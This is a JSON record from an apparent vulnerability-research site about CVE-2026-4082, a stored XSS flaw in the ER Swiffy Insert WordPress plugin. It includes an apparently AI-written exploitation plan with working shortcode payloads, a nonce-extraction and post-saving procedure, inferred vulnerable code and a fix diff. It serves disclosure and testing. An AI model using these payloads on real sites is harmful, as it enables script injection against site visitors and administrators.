[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhkBvJ-UgKSwLCF-_-WQ8XAiF1IOZUZcf4M-mZvXQxAw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4082","er-swiffy-insert-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","ER Swiffy Insert \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The ER Swiffy Insert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [swiffy] shortcode in all versions up to and including 1.0.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes ('n', 'w', 'h'). These attributes are extracted using extract() and directly interpolated into the HTML output without any escaping such as esc_attr(). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","er-swiffy-insert",null,"\u003C=1.0.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:06:24","2026-04-22 07:45:30",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F074d9712-9b26-47da-9e24-49854fd7257c?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-4082 - ER Swiffy Insert Stored XSS\n\n## 1. Vulnerability Summary\nThe **ER Swiffy Insert** plugin (version \u003C= 1.0.0) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[swiffy]` shortcode. The vulnerability exists because the plugin uses the PHP `extract()` function on user-provided shortcode attributes (`n`, `w`, and `h`) and directly interpolates these values into the HTML output without proper sanitization or escaping (e.g., using `esc_attr()`). Authenticated users with **Contributor** level permissions or higher can inject malicious scripts into posts, which will then execute in the context of any user (including Administrators) who views the post.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[swiffy]`\n*   **Vulnerable Attributes:** `n` (name\u002FID), `w` (width), `h` (height)\n*   **Authentication Level:** Contributor+ (Users who can create or edit posts)\n*   **Injection Point:** Post or Page content\n*   **Sink:** Frontend page rendering where the shortcode is processed.\n*   **Preconditions:** The plugin `er-swiffy-insert` must be active.\n\n## 3. Code Flow\n*Based on the vulnerability description, the expected code structure is:*\n\n1.  **Entry Point:** The plugin registers a shortcode handler:\n    `add_shortcode('swiffy', 'swiffy_insert_shortcode_handler');` (handler name inferred).\n2.  **Input Handling:** Inside the handler, the `$atts` array is processed:\n    ```php\n    \u002F\u002F Inferred code based on description\n    function swiffy_insert_shortcode_handler($atts) {\n        extract(shortcode_atts(array(\n            'n' => '',\n            'w' => '100%',\n            'h' => '500'\n        ), $atts));\n        \u002F\u002F ...\n    ```\n3.  **Vulnerable Sink:** The extracted variables `$n`, `$w`, and `$h` are placed directly into a string returned by the function:\n    ```php\n    \u002F\u002F Inferred vulnerable output\n    return '\u003Cdiv id=\"' . $n . '\" style=\"width:' . $w . '; height:' . $h . ';\">\u003C\u002Fdiv>';\n    ```\n4.  **Result:** Since `esc_attr()` is missing, an attacker can provide a value for `n` like `\">\u003Cscript>alert(1)\u003C\u002Fscript>` to break out of the `id` attribute and execute arbitrary JS.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin-defined nonce for **execution**, as shortcodes are processed by WordPress core when rendering post content. However, to **inject** the shortcode as a Contributor, the attacker must be able to save a post.\n\n**To acquire the `_wpnonce` for saving a post:**\n1.  Log in as a Contributor user.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Use `browser_eval` to extract the nonce: `browser_eval(\"document.querySelector('#_wpnonce').value\")`.\n4.  Alternatively, the agent can simply use the `browser_navigate` and `browser_type` tools to create a post manually, which bypasses the need to manually handle nonces in raw HTTP requests.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nAuthenticate as a **Contributor** user.\n\n### Step 2: Inject Malicious Shortcode\nCreate a new post containing the malicious shortcode. We will target the `n` attribute.\n\n*   **Payload:** `[swiffy n='swiffy-obj\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" data-x=\"']`\n    *   *Note: This payload breaks out of the `id` attribute and uses `onmouseover` covering the whole screen to ensure execution, or a simpler `\u003Cscript>` tag if the container allows.*\n*   **Alternative Payload:** `[swiffy n='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\n### Step 3: Request Configuration\nIf using `http_request` (Playwright) to save the post:\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `[ID of the post created in Step 2]`\n    *   `_wpnonce`: `[extracted nonce]`\n    *   `content`: `[swiffy n='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_title`: `Stored XSS Test`\n    *   `post_status`: `publish` (Note: Contributors' posts go to 'pending', but the XSS is stored in the database regardless).\n\n## 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `er-swiffy-insert` is installed and activated.\n2.  **User Creation:** Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:** Create a post as the contributor.\n    *   `wp post create --post_type=post --post_status=draft --post_author=[User_ID] --post_title=\"XSS Source\"`\n\n## 7. Expected Results\n1.  When the post is viewed (even in \"Preview\" mode by the Contributor or \"Edit\" mode by an Admin), the shortcode handler will execute.\n2.  The resulting HTML will look like:\n    `\u003Cdiv id=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" style=\"width:100%; height:500;\">\u003C\u002Fdiv>`\n3.  The browser will execute the injected script, triggering an alert box with the domain name.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the content of the post.\n    *   `wp post get [POST_ID] --field=post_content`\n2.  **Frontend Check:** Navigate to the post URL (as Admin) and check for the existence of the script in the HTML source.\n    *   Look for `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` inside the rendered page content.\n\n## 9. Alternative Approaches\nIf the `n` attribute is restricted by other WordPress filters, try the `w` or `h` attributes:\n*   `[swiffy w='100%;\" onmouseover=\"alert(1)\"']`\n*   `[swiffy h='500;background:url(javascript:alert(1))']` (Works in older browsers or specific CSS contexts).\n\nIf the `extract()` call happens before `shortcode_atts()`, there might be a variable overwriting vulnerability, but the primary XSS vector remains the most direct path.","The ER Swiffy Insert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [swiffy] shortcode in versions up to 1.0.0. The plugin fails to sanitize or escape user-supplied shortcode attributes ('n', 'w', 'h') before outputting them in HTML, allowing authenticated users with Contributor-level access to inject arbitrary scripts into pages.","\u002F\u002F er-swiffy-insert.php (inferred from analysis)\nfunction swiffy_insert_shortcode_handler($atts) {\n    extract(shortcode_atts(array(\n        'n' => '',\n        'w' => '100%',\n        'h' => '500'\n    ), $atts));\n\n    \u002F\u002F The variables $n, $w, and $h are directly interpolated without escaping\n    return '\u003Cdiv id=\"' . $n . '\" style=\"width:' . $w . '; height:' . $h . ';\">\u003C\u002Fdiv>';\n}\nadd_shortcode('swiffy', 'swiffy_insert_shortcode_handler');","--- er-swiffy-insert.php\n+++ er-swiffy-insert.php\n@@ -1,8 +1,8 @@\n function swiffy_insert_shortcode_handler($atts) {\n-    extract(shortcode_atts(array(\n+    $a = shortcode_atts(array(\n         'n' => '',\n         'w' => '100%',\n         'h' => '500'\n-    ), $atts));\n-    return '\u003Cdiv id=\"' . $n . '\" style=\"width:' . $w . '; height:' . $h . ';\">\u003C\u002Fdiv>';\n+    ), $atts);\n+    return '\u003Cdiv id=\"' . esc_attr($a['n']) . '\" style=\"width:' . esc_attr($a['w']) . '; height:' . esc_attr($a['h']) . ';\">\u003C\u002Fdiv>';\n }","The exploit targets the [swiffy] shortcode, which is available to users with at least Contributor-level permissions. An attacker creates or edits a post and inserts a shortcode payload such as [swiffy n='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. When an administrator or any other user views the post, the plugin's shortcode handler processes the 'n' attribute, breaks out of the HTML 'id' attribute context, and executes the injected script in the victim's browser context.","gemini-3-flash-preview","2026-04-27 14:00:53","2026-04-27 14:01:10",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fer-swiffy-insert\u002Ftags"]